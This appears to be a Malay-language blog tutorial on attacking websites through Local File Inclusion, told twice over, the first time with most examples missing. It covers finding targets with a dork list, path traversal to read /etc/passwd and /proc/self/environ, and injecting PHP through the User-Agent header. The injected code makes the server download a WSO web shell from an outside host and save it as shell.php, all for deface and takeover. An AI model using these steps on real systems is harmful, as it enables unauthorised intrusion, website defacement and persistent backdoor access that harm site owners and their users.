Cara LFI Upload Shell
Assalamualaikum dan salam sejahtera.Hari ini aku nak buat tuto cara nak upload shell dan deface website dengan LFI atau nama penuhnya Local File Inclusion.
Ok jom mula..
1. Mula-mula cari website target.Dork boleh dapatkan di :
http://pastebin.com/rKWHFHVT
2. Lepas dah dapat web target kita kena test pulak.
Katakan lah url web tu macam ni :
untuk test vuln ke tak, kita buat macam ni :
tambah ../ kat hujung tu.Kalau vuln, kita akan dapat error :
Kemungkinan besar web tu vuln LFI.Jom kita test lagi.
Kali ni kita nak cari etc/passwd pulak.
buat macam ni :
Kita dapat error lagi dan tak ada etc/passwd
Jadi kita naik lagi directory lain.cara nya tambah ../ kat depan
Tambah ../ sampai jumpa etc/passwd
Kalau berjaya kita akan dapat macam ni :
Yes! tu maksudnya web tu vulnerable kepada LFI.
3. Sekarang masa untuk tengok samaada directory proc/self/environ dapat diakses atau tidak.
Caranya gantikan etc/passwd tadi dengan proc/self/environ .
Contoh :
Kalau boleh diakses korang akan dapat error macam ni :
Kalau keluar kosong ja, tak ada tulis macam ni, maksudnya direktory proc/self/environ tak dapat diakses ataupun OS yang digunakan ialah FreeBSD.
4. Sekarang masanya untuk kita inject shell kedalam proc/self/environ. Caranya ialah dengan inject code kita melalui User-Agent HTTP Header.
Kita boleh guna add-on Tamper Data yang boleh didapati dalam Mozilla Firefox untuk inject code kita.
Buka Tamper Data dalam firefox (alt+T > Tamper Data).Kemudian click Start Tamper.
Selepas itu buka website target :
http://www.website.com/view.php?page=../../../proc/self/environ
Kemudian akan keluar popup.
Isi kotak User-Agent dengan code :
Kemudian click OK.
Kalau berjaya shell.php akan dihasilkan dalam directory website target kita tadi.
Sekarang masa untuk access shell kita tadi :
Kalau berjaya shell yang kita inject tadi akan ada.
Itu saja cara untuk upload shell dengan LFI.
Selamat berjaya!
Ok jom mula..
1. Mula-mula cari website target.Dork boleh dapatkan di :
http://pastebin.com/rKWHFHVT
2. Lepas dah dapat web target kita kena test pulak.
Katakan lah url web tu macam ni :
http://www.website.com/view.php?page=contact.php
untuk test vuln ke tak, kita buat macam ni :
http://www.website.com/view.php?page=../
tambah ../ kat hujung tu.Kalau vuln, kita akan dapat error :
Warning: include(../)
[function.include]: failed to open stream: No such file or directory in
/home/reaperz/public_html/website.com/view.php on line 1337
Kemungkinan besar web tu vuln LFI.Jom kita test lagi.
Kali ni kita nak cari etc/passwd pulak.
buat macam ni :
http://www.website.com/view.php?page=../etc/passwd
Kita dapat error lagi dan tak ada etc/passwd
Jadi kita naik lagi directory lain.cara nya tambah ../ kat depan
http://www.website.com/view.php?page=../../../etc/passwd
Tambah ../ sampai jumpa etc/passwd
Kalau berjaya kita akan dapat macam ni :
root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
test:x:13:30:test:/var/test:/sbin/nologin ftp:x:14:50:FTP
User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin
Yes! tu maksudnya web tu vulnerable kepada LFI.
3. Sekarang masa untuk tengok samaada directory proc/self/environ dapat diakses atau tidak.
Caranya gantikan etc/passwd tadi dengan proc/self/environ .
Contoh :
http://www.website.com/view.php?page=../../../proc/self/environ
Kalau boleh diakses korang akan dapat error macam ni :
DOCUMENT_ROOT=/home/reaperz/public_html
GATEWAY_INTERFACE=CGI/1.1 HTTP_ACCEPT=text/html, application/xml;q=0.9,
application/xhtml+xml, image/png, image/jpeg, image/gif,
image/x-xbitmap, */*;q=0.1
HTTP_COOKIE=PHPSESSID=134cc7261b341231b9594844ac2ad7ac
HTTP_HOST=www.website.com
HTTP_REFERER=http://www.website.com/index.php?view=../../../../../../etc/passwd
HTTP_USER_AGENT=Opera/9.80 (Windows NT 5.1; U; en) Presto/2.2.15
Version/10.00 PATH=/bin:/usr/bin
QUERY_STRING=view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron
REDIRECT_STATUS=200 REMOTE_ADDR=6x.1xx.4x.1xx REMOTE_PORT=35665
REQUEST_METHOD=GET
REQUEST_URI=/index.php?view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron
SCRIPT_FILENAME=/home/sirgod/public_html/index.php
SCRIPT_NAME=/index.php SERVER_ADDR=1xx.1xx.1xx.6x
SERVER_ADMIN=webmaster@website.com SERVER_NAME=www.website.com
SERVER_PORT=80 SERVER_PROTOCOL=HTTP/1.0 SERVER_SIGNATURE=
Apache/1.3.37 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at http://www.website.com Port 80
Apache/1.3.37 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at http://www.website.com Port 80
Kalau keluar kosong ja, tak ada tulis macam ni, maksudnya direktory proc/self/environ tak dapat diakses ataupun OS yang digunakan ialah FreeBSD.
4. Sekarang masanya untuk kita inject shell kedalam proc/self/environ. Caranya ialah dengan inject code kita melalui User-Agent HTTP Header.
Kita boleh guna add-on Tamper Data yang boleh didapati dalam Mozilla Firefox untuk inject code kita.
Buka Tamper Data dalam firefox (alt+T > Tamper Data).Kemudian click Start Tamper.
Selepas itu buka website target :
http://www.website.com/view.php?page=../../../proc/self/environ
Kemudian akan keluar popup.
Tick Continue Tampering dan click Tamper.Kemudian akan keluar popup lagi :
Isi kotak User-Agent dengan code :
http://shell.reaperz.net/wso.txt -O shell.php’);?>
Kemudian click OK.
Kalau berjaya shell.php akan dihasilkan dalam directory website target kita tadi.
Sekarang masa untuk access shell kita tadi :
http://www.website.com/shell.php
Kalau berjaya shell yang kita inject tadi akan ada.
Itu saja cara untuk upload shell dengan LFI.
Selamat berjaya!
Comments
Post a Comment